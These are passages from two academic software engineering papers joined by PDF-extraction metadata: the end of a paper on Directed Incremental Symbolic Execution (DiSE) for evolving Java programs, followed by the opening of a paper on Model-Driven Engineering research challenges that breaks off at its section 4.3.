of the change, also have a considerable effect on the reductions that can be achieved by DiSE (or any other technique that can characterize the effects of program changes). We also conjecture that program structure, particularly with regard to the number and complexity of the constraints generated during symbolic execution contributes to the differences in execution time for each technique.
RQ2 (Effectiveness). The number of path conditions computed by DiSE varies greatly between versions for all three examples as shown in Tables 4.2.1(a)–(c). For the 15 versions analyzed in the ASW example, DiSE computes between zero and three path conditions for 13 versions. For the other two versions, DiSE computes approximately 22% of the path conditions generated by full symbolic execution (381 and 383 path conditions). In v1 of the ASW example, no CFG nodes are changed due to a compiler optimization that effectively masks the change, and for the remaining versions where no path conditions are generated, one or more CFG nodes was affected, however, the changes do not affect the path conditions generated by DiSE.
While none of the changes require DiSE to explore all paths in the ASW or OAE examples, in five of the 16 versions of the WBS example, DiSE generate the same number of path conditions as full symbolic execution. For these five versions, the number of changed CFG nodes ranges from one to three (out of 100 CFG nodes), and the number of affected CFG nodes ranges from 39 to 42. On the other hand, in v12 of the WBS example where only six path conditions are generated by DiSE (compared with 24 by full symbolic execution), eight CFG nodes are changed and 65 nodes are affected. In the OAE example, the change made to v6 affects seven CFG nodes (10%) and generates 26,164 path conditions – 20% of the path conditions computed by full symbolic execution. In v7, the changes affect 43 CFG nodes (62%) and yet the same number of path conditions is generated. Based on our analysis of the mutants created for these examples, there does not appear to be any correlation between the number or percentage of affected nodes and the number of affected path conditions.
Overall, our study demonstrates that for the examples used in this study, DiSE has potential application for detecting and characterizing affected program behaviors in evolving software. In the artifacts used in our evaluation, DiSE was able to correctly identify and characterize the subset of path conditions computed by full symbolic execution as affected. In some instances, the change affected only a small percentage of path conditions, and in others, the change(s) had a much greater impact. When only a subset of the path conditions were affected by the changes, DiSE was able to consistently compute the affected path conditions in less time – often several orders of magnitude – than full symbolic execution; when all of the path conditions were affected by the changes, the overhead incurred by DiSE was between nine and 30% for these examples.
5. Discussion
The goal of DiSE is to enable more efficient symbolic execution by focusing it on generating affected path conditions. DiSE uses a conservative analysis to identify affected program locations. Thus, in principle, DiSE may generate some path conditions that represent unchanged paths. However, as experimental results demonstrate, DiSE is effective at focusing symbolic execution on affected program behaviors and enables efficient incremental symbolic execution.
5.1 Bug finding using DiSE
DiSE can handle programs with assertions when the “assert” statements are de-sugared into “if” and “throw” statements. In Java programs, this de-sugaring takes place when assert statements in Java source are compiled into Java byte code. Since DiSE performs symbolic execution on Java byte code, DiSE will not miss detecting a failed assertion violation caused by a program change. Thus, DiSE supports finding bugs when assertions are present and assertion failures characterize bugs. If the assertions were written in a language other than the underlying programming language (e.g., Alloy [16] assertions in Java programs), our technique would work with the assertions translated to Java (e.g., from Alloy).
5.2 Software evolution
The results of DiSE can be used to support various software evolution tasks. We present one such application—regression testing as it relates to test case selection and augmentation. We note that our goal is not to demonstrate the effectiveness of test case selection and augmentation, but, rather to demonstrate one application of DiSE results to support software evolution tasks.
SPF outputs values that can be used for the method arguments (test inputs) based on the generated path conditions. The test inputs are produced by solving the constraints in the path condition and using the resulting values to generate a call to the method under analysis. The results are output in string format. Our implementation of test case selection and augmentation is trivial in its approach – it simply performs a string comparison of the test cases generated for the original version (by full symbolic execution) with the tests generated by DiSE. Tests generated for the original version of the method represent an existing test suite. Tests generated by DiSE that are also found in the tests generated for the original version are marked as selected, while the other tests are considered tests to be added to augment the test suite.
The results of using DiSE to perform test case selection and test case augmentation for our three examples are shown in Tables 3(a)–(c). The combination of selected and added tests execute all of the branches in the program that are in some way affected by the changes made to the method under analysis. Full symbolic execution on the original version of ASW generates 256 tests, while full symbolic execution on the WBS and OAE examples generates 24 tests and 2,920 tests respectively. Note that the number of test cases generated by symbolic execution and by DiSE differs from the number of path conditions generated by each technique; this is due to the fact that the current implementation of the test generation tool computes input values only for the method arguments, i.e., a partial state. As a result, when fields are represented by symbolic values, multiple path conditions generated by a given technique may map to a single set of concrete inputs to the method under analysis.
For all of the artifacts in our study, the results of DiSE can be used to identify test cases that can be re-used, and the test cases that exercise affected path conditions for which test cases must be generated. For the ASW and WBS examples, DiSE results show that only a small number of test cases is necessary to augment the test suite for the new version of the program. For the OAE exam-
ple, the results of DiSE indicate that for some changes, e.g., v3, it is unnecessary to generate any new test cases. For versions v6 and v8, however, only two of the existing test cases are valid for the new version of the program and 584 test cases are necessary to test the program behaviors identified as affected by DiSE. When only a subset of the path conditions is affected by the changes to a program, using DiSE results for test case selection and augmentation of the artifacts in our study would result in executing between 20% and 70% of the test cases that would be run in a re-test all approach, reducing the time necessary for regression testing of the new version of the program.
The requirements for soundness and completeness of an analysis are driven by the needs of the specific evolution task that uses the results of the analysis. For example, the test selection and augmentation application considered here covers all the branches in the method that are affected by the change. However, it does not necessarily provide full (bounded) path coverage. To achieve full path coverage, additional information could potentially be recorded from a previous run, and combined with DiSE results. As future work, we plan to investigate the use of DiSE for other software evolution tasks.
6. Related Work
Recent years have seen a significant growth in research projects based on symbolic execution, first introduced in the 1970’s by Clarke [7] and King [22]. These projects have pursued three primary research directions to enhance traditional symbolic execution: (1) to improve its effectiveness [4, 10, 12, 19, 32]; (2) to improve its efficiency [1, 3, 5, 11, 20, 31, 37]; and (3) to improve its applicability [8, 18, 27, 33]. The novelty of DiSE is to leverage state-of-the-art symbolic execution techniques and apply a static analysis in synergy to enable symbolic execution to perform more efficiently as a program undergoes changes.
The projects to enhance the effectiveness of symbolic execution have focused on two areas. First, is to enable symbolic execution to handle programs written in commonly used languages, such as Java and C/C++, by providing support for symbolic execution over the core types used in these languages [4, 10, 12, 19, 32]. The second area of focus is to enable symbolic execution to work around the traditional limitation of undecidability of path conditions through the use of mixed symbolic/concrete execution to attempt to prevent the path conditions from becoming too complex [12, 32].
Research to enhance the efficiency of symbolic execution has followed three basic directions. One, to use abstraction with symbolic execution to reduce the space of exploration [1, 20]. Two, to perform compositional symbolic execution, where summaries of parts of code are used in place of an actual implementation to enable the underlying constraint solvers to perform more efficiently [3, 11]. Three, to enable symbolic execution to find bugs faster through the use of heuristics, e.g., genetic algorithms [37], that directly control the symbolic exploration and focus it on parts that are more likely to contain bugs.
Static analysis has also been used effectively for guiding symbolic execution. Chang’s recent doctoral dissertation [5] uses a def-use analysis based on user-provided control points of interest, and applies a program transformation that incorporates boundary conditions on program inputs into the program logic to enable more efficient bug finding. Santelices and Harrold [31] use control and data dependencies to symbolically execute groups of paths, rather than individual paths to enable scalability. The key difference between DiSE and previous work is the ability of DiSE to utilize information about program differences for efficient symbolic execution as code undergoes changes.
While several projects have made significant advances in applying symbolic execution to test input generation and program verification – two traditional applications of symbolic execution – recent projects have used it as an enabling technology for various novel applications, including program differencing [27], data structure repair [18], dynamic discovery of invariants [8], as well as estimation of energy consumption on hardware devices with limited battery capacity [33].
An application of symbolic execution with a focus on program differences is regression testing [14, 15, 25]. Several recent projects use symbolic execution as a basis of test case selection and augmentation [29, 35, 38]. DiSE differs from these projects in its focus on the core symbolic execution technique to enable a variety of software evolution tasks – not only regression testing.
Program differencing, in general, is a well-studied research area with several techniques for computing differences [2, 21, 27] as well as leveraging them to enable various software evolution tasks [23]. Research in utilizing differences to speed-up symbolic execution by focusing it on code changes has only recently begun. Godefroid et al. [13] consider the problem of statically validating symbolic test summaries against changes, specifically for compositional dynamic test generation. Our approach is complementary since it uses change impact information to explore only the paths of the symbolic execution tree that are affected by the change, thereby reducing the cost of recomputing symbolic summaries.
The Java PathFinder model checker [36] has previously been used for incremental checking of programs that undergo changes [24, 39]. Incremental state-space exploration (ISSE) [24] focuses on evolving programs and stores the explored state space graph to use it for checking a subsequent version of the program, and reduces the time necessary for state-space exploration by avoiding the execution of some transitions and related computations that are not necessary. Regression model checking (RMC) [39] presents a complementary approach to ISSE and uses the difference between two versions to drive the pruning of the state space when model checking the new version. RMC computes reachable program coverage elements, e.g., basic blocks, for each program state during a recording mode run of RMC on the original version. Impact analysis is then used to calculate dangerous elements whose behavior may now differ because of changes. This is done by comparing the bytecodes and control-flow graphs for the two program versions. The dangerous elements information is then combined with the reachable elements information to prune safe sub-state spaces during a pruning mode run of RMC on the modified version of the program. DiSE takes inspiration from RMC and supports incremental symbolic execution, which is not addressed by RMC and ISSE. Moreover, a key difference between DiSE and previous work is that to analyze the current program version DiSE does not require the availability of the internal states of the previous analysis run – ISSE requires the state-space graph and RMC requires the dynamic reachability information for program coverage elements.
7. Conclusions and Future Work
In this paper, we introduced Directed Incremental Symbolic Execution (DiSE), a novel technique that leverages program differences to guide symbolic execution to explore and characterize the effects of program changes. We implemented DiSE in the symbolic execution extension of the Java PathFinder verification framework, and evaluated its cost and effectiveness on methods from three Java applications. The results of our case-study demonstrate that DiSE efficiently generates the set of path conditions affected by the change(s) to a program. We demonstrate the utility of our technique by using DiSE results to perform test case selection and test input generation for the examples in our study.
DiSE is an intra-procedural, incremental analysis technique that generates and characterizes method-level differences. DiSE does not generate affected path conditions arising from the control and
Acknowledgments
The authors gratefully acknowledge the contributions of Matt Dwyer and Gregg Rothermel to early work on DiSE. The authors also thank Eric Mercer for the helpful comments to improve the paper. The work of Yang and Khurshid was supported in part by the NSF under Grant Nos. IIS-0438967 and CCF-0845628, and AFOSR grant FA9550-09-1-0351.
References
|
{"Source-Url": "https://ntrs.nasa.gov/archive/nasa/casi.ntrs.nasa.gov/20110023245.pdf", "len_cl100k_base": 14741, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 48650, "total-output-tokens": 17583, "length": "2e13", "weborganizer": {"__label__adult": 0.00035643577575683594, "__label__art_design": 0.0002999305725097656, "__label__crime_law": 0.0002834796905517578, "__label__education_jobs": 0.0007586479187011719, "__label__entertainment": 6.324052810668945e-05, "__label__fashion_beauty": 0.0001474618911743164, "__label__finance_business": 0.0001685619354248047, "__label__food_dining": 0.0002751350402832031, "__label__games": 0.0006966590881347656, "__label__hardware": 0.0008406639099121094, "__label__health": 0.0004105567932128906, "__label__history": 0.0002582073211669922, "__label__home_hobbies": 7.253885269165039e-05, "__label__industrial": 0.0003018379211425781, "__label__literature": 0.00027871131896972656, "__label__politics": 0.0002294778823852539, "__label__religion": 0.0004413127899169922, "__label__science_tech": 0.0171966552734375, "__label__social_life": 7.742643356323242e-05, "__label__software": 0.005054473876953125, "__label__software_dev": 0.970703125, "__label__sports_fitness": 0.0002970695495605469, "__label__transportation": 0.0005297660827636719, "__label__travel": 0.00018227100372314453}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 71086, 0.04174]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 71086, 0.621]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 71086, 0.89575]], "google_gemma-3-12b-it_contains_pii": [[0, 4965, false], [4965, 12315, null], [12315, 16650, null], [16650, 24771, null], [24771, 27927, null], [27927, 33060, null], [33060, 40011, null], [40011, 47341, null], [47341, 50333, null], [50333, 57220, null], [57220, 65231, null], [65231, 71086, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4965, true], [4965, 12315, null], [12315, 16650, null], [16650, 24771, null], [24771, 27927, null], [27927, 33060, null], [33060, 40011, null], [40011, 47341, null], [47341, 50333, null], [50333, 57220, null], [57220, 65231, null], [65231, 71086, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 71086, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 71086, null]], "pdf_page_numbers": [[0, 4965, 1], [4965, 12315, 2], [12315, 16650, 3], [16650, 24771, 4], [24771, 27927, 5], [27927, 33060, 6], [33060, 40011, 7], [40011, 47341, 8], [47341, 50333, 9], [50333, 57220, 10], [57220, 65231, 11], [65231, 71086, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 71086, 0.1039]]}
|
olmocr_science_pdfs
|
2024-12-06
|
2024-12-06
|
cd0073d66a832abd200aff519d92b2428bf1a6f4
|
Abstract
The term Model-Driven Engineering (MDE) is typically used to describe software development approaches in which abstract models of software systems are created and systematically transformed to concrete implementations. In this paper we give an overview of current research in MDE and discuss some of the major challenges that must be tackled in order to realize the MDE vision of software development. We argue that full realizations of the MDE vision may not be possible in the near to medium-term primarily because of the wicked problems involved. On the other hand, attempting to realize the vision will provide insights that can be used to significantly reduce the gap between evolving software complexity and the technologies used to manage complexity.
1. Introduction
Advances in hardware and network technologies have paved the way for the development of increasingly pervasive software-based systems of systems that collaborate to provide essential services to society. Software in these systems is often required to (1) operate in distributed and embedded computing environments consisting of diverse devices (personal computers, specialized sensors and actuators), (2) communicate using a variety of interaction paradigms (e.g., SOAP messaging, media streaming), (3) dynamically adapt to changes in operating environments, and (4) behave in a dependable manner [26, 62]. Despite significant advances in programming languages and supporting integrated development environments (IDEs), developing these complex software systems using current code-centric technologies requires herculean effort.
A significant factor behind the difficulty of developing complex software is the wide conceptual gap between the problem and the implementation domains of discourse. Bridging the gap using approaches that require extensive handcrafting of implementations gives rise to accidental complexities that make the development of complex software difficult and costly. To an extent, handcrafting complex software systems can be likened to building pyramids in ancient Egypt. We marvel at these software implementations in much the same way that archaeologists marvel at the pyramids: The wonder is mostly based on an appreciation of the effort required to tackle the significant accidental complexities arising from the use of inadequate technologies.
The growing complexity of software is the motivation behind work on industrializing software development. In particular, current research in the area of model driven engineering (MDE) is primarily concerned with reducing the gap between problem and software implementation domains through the use of technologies that support systematic transformation of problem-level abstractions to software implementations. The complexity of bridging the gap is tackled through the use of models that describe complex systems at multiple levels of abstraction and from a variety of perspectives, and through automated support for transforming and analyzing models. In the MDE vision of software development, models are the primary artifacts of development and developers rely on computer-based technologies to transform models to running systems.
Current work on MDE technologies tends to focus on producing implementation and deployment artifacts from detailed design models. These technologies use models to generate significant parts of (1) programs written in languages such as Java, C++, and C♯ (e.g., see Compuware’s OptimalJ, IBM’s Rational XDE package, and Microsoft’s Visual Studio), and (2) integration and deployment artifacts such as XML-based configuration files and data bridges used for integrating disparate systems (e.g., see [25]).
Attempts at building complex software systems that dynamically adapt to changes in their operating environments has led some researchers to consider the use of models dur-
ing runtime to monitor and manage the executing software. Early work in this emerging MDE area was presented at a MODELS 2006 Workshop on runtime models [8].
We envisage that MDE research on runtime models will pave the way for the development of environments in which change agents (e.g., software maintainers, software-based agents) use runtime models to modify executing software in a controlled manner. The models act as interfaces that change agents can use to adapt, repair, extend, or retrofit software during its execution. In our broad vision of MDE, models are not only the primary artifacts of development, they are also the primary means by which developers and other systems understand, interact with, configure and modify the runtime behavior of software.
A major goal of MDE research is to produce technologies that shield software developers from the complexities of the underlying implementation platform. An implementation platform may consist of networks of computers, middleware, and libraries of utility functions (e.g., libraries of persistence, graphical user interface, and mathematical routines). In the case of MDE research on runtime models, the goal is to produce technologies that hide the complexities of runtime phenomena from agents responsible for managing the runtime environment, and for adapting and evolving the software during runtime.
Realizing the MDE vision requires tackling a wide range of very difficult interrelated social and technical problems that has been the focus of software engineering research over the last three decades. For this reason, we consider the problem of developing MDE technologies that automate significant portions of the software lifecycle to be a wicked problem. A wicked problem has multiple dimensions that are related in complex ways and thus cannot be solved by cobbling solutions to the different problem dimensions (see definition of “wicked problem” in Wikipedia). Solutions to wicked problems are expensive to develop and are invariably associated with other problems, but the development of the solutions can deepen understanding of the problems.
In this paper we discuss some of the major technical problems and challenges associated with realizing the broad MDE vision we outline above. We also mention the social challenges related to identifying and leveraging high-quality modeling experience in MDE research.
In Section 2 we describe software development as a modeling activity and present the research questions that should drive MDE research. In Section 3 we discuss the factors that contribute to the difficulty of bridging the gap between the problem and implementation domains, present classes of challenges and problems discussed in this paper, and discuss the relationship between MDE and other areas of software engineering research. In Section 4 we provide background on some of the major MDE initiatives. In Section 5, Section 6, and Section 7, we discuss MDE research challenges in the areas of modeling languages, separation of concerns, and model manipulation and management, respectively. Section 7 also includes a discussion on opportunities for using models during runtime. We conclude in Section 8 by outlining an idealistic vision of an MDE environment.
2. The Value of Modeling
In this paper, a model is an abstraction of some aspect of a system. The system described by a model may or may not exist at the time the model is created. Models are created to serve particular purposes, for example, to present a human understandable description of some aspect of a system or to present information in a form that can be mechanically analyzed (e.g., see [54, 30]).
It may seem that work on MDE centers on the development and use of the popular modeling language, UML (the Unified Modeling Language) [59]. The UML standardization effort has played a vital role in bringing together a community that focuses on the problem of raising the level of abstraction at which software is developed, but research around other modeling languages is contributing valuable MDE concepts, techniques, tools and experience. In this paper, MDE encompasses all research pertaining to the use of software models.
Non-UML modeling approaches that are included in our use of the MDE term include specifying systems using formal specification languages such as Alloy [32] and B [2], modeling and analyzing control system software using the math-based, high-level programming language Matlab/Simulink/Stateflow (e.g., see [34]), analyzing performance, load, safety, liveness, reliability, and other system properties using specialized modeling techniques (e.g., see [40]), and building models to analyze software risks (e.g., see [20, 27, 50]).
Source code can be considered to be a model of how a system will behave when executed. While we may draw inspiration from work on the development of programming languages and compilers, this paper is primarily concerned with the development and use of models other than source code. Specifically, we focus attention on the following two broad classes of models:
• **Development models:** These are models of software at levels of abstraction above the code level. Examples of development models are requirements, architectural, implementation and deployment models. MDE research has tended to focus on the creation and use of these models.
• **Runtime models:** These models present views of some aspect of an executing system and are thus abstractions of runtime phenomena. A growing number of MDE
researchers have started to explore how models can be used to support dynamic adaptation of software-based systems.
As MDE research matures, the above classification may become dynamic, that is, development models may be used as runtime models and runtime models may be used to evolve software systems, thus acting as development models.
There is a perception that development models are primarily documentation artifacts and thus their creation and use are peripheral to software development. This narrow perspective has led to recurring and seemingly futile debates on the practical value of modeling (i.e., the value of documentation) in software development. MDE advocates point out that models can be beneficially used for more than just documentation during development. For example, Bran Selic, an IBM Distinguished Engineer, points out an important property of software that MDE seeks to exploit: “Software has the rare property that it allows us to directly evolve models into full-fledged implementations without changing the engineering medium, tools, or methods.” Selic and others argue that modeling technologies leveraging this property can significantly reduce the accidental complexities associated with handcrafting complex software [60].
The formal methods community attempted to leverage this property in work on transformation-based software development in which declarative specifications are systematically transformed to programs (e.g., see [7]). One of the valuable insights gained from these attempts is that automation of significant aspects of the transformation of a high-level specification to an implementation requires encoding domain-specific knowledge in the transformation tools. Challenges associated with developing and using domain-specific technologies will be discussed in Section 5.
The process of analyzing a problem, conceiving a solution, and expressing a solution in a high-level programming language can be viewed as an implicit form of modeling and thus one can argue that software development is essentially a model-based problem solving activity. The mental models of the system held by developers while creating programs may be shared with others using informal “whiteboard” sketches or more formally as statements (including diagrams) in a modeling language. These mental models evolve as a result of discussions with other developers, changes in requirements, and errors identified in code tests, and they guide the development of handcrafted code. Writing source code is a modeling activity because the developer is modeling a solution using the abstractions provided by a programming language.
Given that the technical aspects of software development are primarily concerned with creating and evolving models, questions about whether we should or should not use models seem superfluous. A more pertinent question is “Can modeling techniques be more effectively leveraged during software development?” From this perspective, the research question that should motivate MDE research on creation and use of development models is the following:
How can modeling techniques be used to tame the complexity of bridging the gap between the problem domain and the software implementation domain?
Henceforth, we will refer to this gap as the problem-implementation gap.
We propose that MDE research on runtime models focus on the following research questions:
- How can models be cost-effectively used to manage executing software? Management can involve monitoring software behavior and the operating context, and adapting software so that it can continue to provide services when changes are detected in operating conditions.
- How can models be used to effect changes to running systems in a controlled manner? Research in this respect will focus on how models can be used as interfaces between running systems and change agents, where a change agent can be a human developer or a software agent.
There is currently very little work on the runtime modeling questions and thus there is very little research experience that can be used to bound possible solutions. We discuss some of the challenges we envisage in Section 7.3, but this paper focuses on development models primarily because current MDE research provides significant insights into associated challenges and problems.
3. MDE Research Concerns
MDE research on development models focuses on developing techniques, methods, processes and supporting tools that effectively narrow the problem-implementation gap. Exploring the nature of the problem-implementation gap can yield insights into the problems and challenges that MDE researchers face.
3.1. Bridging the Gap
A problem-implementation gap exists when a developer implements software solutions to problems using abstractions that are at a lower level than those used to express the problem. In the case of complex problems, bridging the gap...
using methods that rely almost exclusively on human effort will introduce significant accidental complexities [60].
The introduction of technologies that effectively raise the implementation abstraction level can significantly improve productivity and quality with respect to the types of software targeted by the technologies. The introduction and successful use of the technologies will inevitably open the door to new software opportunities that are acted upon. The result is a new generation of more complex software systems and associated software development concerns. For example, the introduction of middleware technologies, coupled with improvements in network and mobile technologies, has made it possible to consider the development of more complex distributed systems involving fixed and mobile elements.
The growing complexity of newer generations of software systems can eventually overwhelm the available implementation abstractions, resulting in a widening of the problem-implementation gap. The widening of the gap leads to dependence on experts who have built up an arsenal of mentally-held development patterns (a.k.a “experience”) to cope with growing complexity.
Growing software complexity will eventually overwhelm the mentally-held experience and the need for technologies that leverage explicit forms of experience (e.g., domain-specific design patterns) to further raise the level of abstraction at which software is developed will become painfully apparent. The development of such technologies will result in work on even more complex software systems, thus triggering another cycle of work on narrowing the problem-implementation gap.
The preceding discussion indicates that research on narrowing the problem-implementation gap tends to progress through a series of crises-driven cycles. Each cycle results in a significant change in the level of abstraction at which software is developed, which then triggers attempts at building even more complex software. This characterization acknowledges that software development concerns and challenges evolve with each new generation of software systems, that is, the nature of the so-called “software crisis” evolves.
To cope with the ever-present problem of growing software complexity MDE researchers need to develop technologies that developers can use to generate domain-specific software development environments. These environments should consist of languages and tools that are tailored to the target classes of applications. Developing such technologies requires codifying knowledge that reflects a deep understanding of the common and variable aspects of the gap bridging process. Such an understanding can be gained only through costly experimentation and systematic accumulation and examination of experience. Developing such technologies is thus a wicked problem.
While it may not be possible to fully achieve the MDE vision, close approximations can significantly improve our ability to manage the problem-implementation gap. We see no alternative to developing close approximations other than through progressive development of technologies, where each new generation of technologies focuses on solving the problems and minimizing the accidental complexities arising from use of older generations of technologies.
The importance of industrial participation on MDE research should not be underestimated. Industrial feedback on techniques and technologies developed within academia is needed to gain a deeper understanding of development problems.
### 3.2. A Classification of MDE Challenges
The major challenges that researchers face when attempting to realize the MDE vision can be grouped into the following categories:
- **Modeling language challenges**: These challenges arise from concerns associated with providing support for creating and using problem-level abstractions in modeling languages, and for rigorously analyzing models.
- **Separation of concerns challenges**: These challenges arise from problems associated with modeling systems using multiple, overlapping viewpoints that utilize possibly heterogeneous languages.
- **Model manipulation and management challenges**: These challenges arise from problems associated with (1) defining, analyzing, and using model transformations, (2) maintaining traceability links among model elements to support model evolution and roundtrip engineering, (3) maintaining consistency among viewpoints, (4) tracking versions, and (5) using models during runtime.
Section 5 to Section 7 present some of the major challenges in these categories.
### 3.3. Relationship with Software Engineering Research
Realizing the MDE vision of software development will require evolving and integrating research results from different software engineering areas. There are obvious connections with work on requirements, architecture and detailed design modeling, including work on viewpoint conflict analysis and on feature interaction analysis. Research in these areas have produced modeling concepts, languages, and techniques that address specific concerns in the areas.
MDE research should leverage and integrate the best results from these areas and build synergistic research links with the communities. For example, the challenges faced by researchers in the software architecture area (see [58]) are closely related to MDE challenges and there have been beneficial interactions across the two communities.
Work on formal specification techniques (FSTs) is particularly relevant to MDE. Modeling languages must have formally defined semantics if they are to be used to create analyzable models. Work on developing formal analysis techniques for models utilizes and builds on work in the formal specification research area. While it is currently the case that popular modeling languages have poorly defined semantics, there is a growing realization that MDE requires semantic-based manipulation of models and thus appropriate aspects of modeling languages must be formalized.
It may seem that MDE research can be subsumed by FST research. A closer examination of research results and goals in these areas suggests that this is not the case. The FSTs that have been developed thus far use languages that allow developers to describe systems from a very small number of viewpoints. For example, Z [53] describes systems from data and operation viewpoints, model checking techniques (e.g., see [49]) are applicable to models created using a state transition viewpoint, and petri nets [48] can be used to describe systems from a control flow viewpoint. It is well known that the more expressive a modeling language is, the more intractable the problem of developing mechanical semantic analysis techniques becomes. It should not be surprising then that FSTs restrict their viewpoints.
In MDE, a model of a complex system consists of many views created using a wide variety of viewpoints. Furthermore, FSTs focus on describing functionality, while MDE approaches aim to provide support for modeling structural and functional aspects as well as system attributes (sometimes referred to as “non-functional” aspects).
The differences in research scopes indicate that MDE provides a context for FST research. There is often a need to formally analyze a subset of the views in an MDE model. Members of the FST and the MDE communities need to collaborate to produce formal techniques that can be integrated with rich modeling languages.
The following gives some of the other major software engineering research areas that influence MDE work:
- **Systematic reuse of development experience**: Leveraging explicit forms of development experience to industrialize software development has been the focus of research in the systematic reuse community for over two decades (e.g., see [4, 6, 21, 29, 33]). The term “software factory” was used in the systematic reuse community to refer to development environments that effectively leveraged reusable assets to improve productivity and quality [14]. The term is now being used by Microsoft as a label for its MDE initiative (see Section 4). Research on design patterns, domain-specific languages, and product-line architectures are particularly relevant to work on MDE (e.g., see [38]).
- **Systematic software testing**: Work on systematic testing of programs is being leveraged in work on dynamically analyzing models. For example, there is work on defining test criteria for UML models that are UML-specific variations of coverage criteria used at the code level [3], and tools that support systematic testing of models [18]. There is also work on generating code level tests from models that builds upon work in the specification-based code testing area (e.g., see [10, 43]).
- **Compilation technologies**: Work on optimizing compilers may be leveraged by MDE researchers working on providing support for generating lean and highly optimized code. Work on incremental compilation may also be leveraged in research on incremental code generation.
It can be argued that MDE is concerned with providing automated support for software engineering, and thus falls in the realm of computer-aided software engineering (CASE) research. MDE can and should be viewed as an evolution of early CASE work. MDE researchers are (knowingly or unknowingly) building on the experience and work of early CASE researchers. Unlike early CASE research, which focused primarily on the use of models for documenting systems (e.g., see [17, 19, 24]), MDE research is concerned with broadening the role of models so that they become the primary artifacts of software development. This broadening of the scope is reflected in the range of software engineering research areas that currently influence MDE research.
The need to deal with the complexity of developing and operating adaptive software provides another opportunity for the use of MDE techniques. In this paper, MDE encompasses work that seeks to develop a new generation of CASE environments that address the entire life-cycle of software, from conceptualization to retirement. It is concerned not only with the use of models for engineering complex software, but also with the use of models during the execution of software.
The term “model driven” may be considered by some to be redundant in MDE given that engineering of software invariably involves modeling. While this may be true, it is currently the case that software developers seldom create and effectively utilize models other than code. The term “model driven” in MDE is used to emphasize a shift away from code level abstractions. Only when modeling at various levels of abstraction is widely viewed as an essential part of engineering software should the “model driven” term
be dropped. The availability of good modeling tools can help in this respect.
4. Major Model Driven Engineering Initiatives
In this section we present an overview of some major MDE initiatives that are currently shaping the research landscape and discuss the relationship between MDE and other software engineering research areas.
4.1. Model Driven Architecture
The OMG, in its role as an industry-driven organization that develops and maintains standards for developing complex distributed software systems, launched the Model Driven Architecture (MDA) as a framework of MDE standards in 2001 [60, 51]. The OMG envisages MDA technologies that will provide the means to more easily integrate new implementation infrastructures into existing designs, generate significant portions of application-specific code, configuration files, data integration bridges and other implementation infrastructure artifacts from models, more easily synchronize the evolution of models and their implementations as the software evolves, and rigorously simulate and test models.
MDA advocates modeling systems from three viewpoints: computation independent, platform independent, and platform specific viewpoints. The computation independent viewpoint focuses on the environment in which the system of interest will operate in and on the required features of the systems. Modeling a system from this viewpoint results in a computation independent model (CIM). The platform independent viewpoint focuses on the aspects of system features that are not likely to change from one platform to another. A platform independent model (PIM) is used to present this viewpoint. The OMG defines a platform as “a set of subsystems and technologies that provide a coherent set of functionality through interfaces and specified usage patterns”. Examples of platforms are technology-specific component frameworks such as CORBA and J2EE, and vendor-specific implementations of middleware technologies such as Borland’s VisiBroker, IBM’s WebSphere, and Microsoft’s .NET.
Platform independence is a quality of a model that is measured in degrees [60]. The platform specific viewpoint provides a view of a system in which platform specific details are integrated with the elements in a PIM. This view of a system is described by a platform specific model (PSM). Separation of platform specific and platform independent details is considered the key to providing effective support for migrating an application from one implementation platform to another.
The pillars of MDA are the Meta Object Facility (MOF), a language for defining the abstract syntax of modeling languages [44], the UML [59], and the Query, View, Transformation standard (QVT), a standard for specifying and implementing model transformations (e.g., PIM to PSM transformations) [46].
4.2. Software Factories
Information about the Microsoft Software Factory initiative became widely available when a book on the topic was published in 2004 [28]. The initiative focuses on the development of MDE technologies that leverage domain-specific knowledge to automate software modeling tasks.
Software Factories tackle the complexity of bridging the gap by providing developers with a framework for producing development environments consisting of domain-specific tools that help automate the transformation of abstract models to implementations. Each development environment is defined as a graph of viewpoints, where each viewpoint describes systems in the application domain from the perspective of some aspect of the development lifecycle (e.g., from a requirements capture or a database design perspective). Reusable forms of development experience (e.g., patterns, templates, guidelines, transformations) are associated with each viewpoint, and thus accessible in the context of that viewpoint. This reduces the need to search for applicable forms of reusable experience, and enables context-based validation, and guidance delivery and enactment [28].
The relationships between viewpoints define semantic links between elements in the viewpoints. For example, the relationships can be used to relate work carried out in one development phase with work performed in another phase, or to relate elements used to describe an aspect of the system with elements used to describe a different aspect. In summary, the Software Factory initiative is concerned with developing technologies that can be used to create development environments for a family of applications.
There are three key elements in a realization of the Software Factory vision:
- **Software factory schema**: This schema is a graph of viewpoints defined using Software Factory technologies. It describes a product line architecture in terms of DSMLs to be used, and the mechanisms to be used to transform models to other models or to implementation artifacts.
- **Software factory template**: A factory template provides the reusable artifacts, guidelines, samples, and custom tools needed to build members of the product family.
- **An extensible development environment**: To realize the software factory vision, a framework that can
be configured using the factory schema and template to produce a development environment for a family of products is needed. The Microsoft Visual Studio Team System has some elements of this framework and there is ongoing work on extending its capabilities.
4.3. Other MDE Approaches
